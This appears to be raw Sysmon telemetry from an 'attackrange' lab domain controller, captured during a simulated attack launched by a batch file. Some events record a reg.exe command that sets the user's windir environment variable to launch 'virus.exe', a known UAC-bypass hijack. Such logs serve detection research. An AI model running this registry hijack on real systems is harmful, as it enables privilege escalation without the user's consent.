07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.205{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 2 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 13241300x80000000000000001050945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:57:17.196{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windircmd /c start C:\temp\test\virus.exe&REM 10341000x80000000000000001050944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.195{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Environment" /v "windir" /d "cmd /c start C:\temp\test\virus.exe&REM " C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.150{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.150{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.150{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.150{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.134{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.134{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.134{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.148{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\System32\mode.com10.0.14393.0 (rs1_release.160715-1616)DOS Device MODE UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationMODE.COMmode 18,1C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=614F8D56EE8470746B6F68CEA0C2A838,SHA256=95696BF3D50A47A840D8CED5CD0E88677372411E9AB698B644244051B69C6E6A,IMPHASH=FD0E8966C3BCFE9DE1C17814481140CD{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 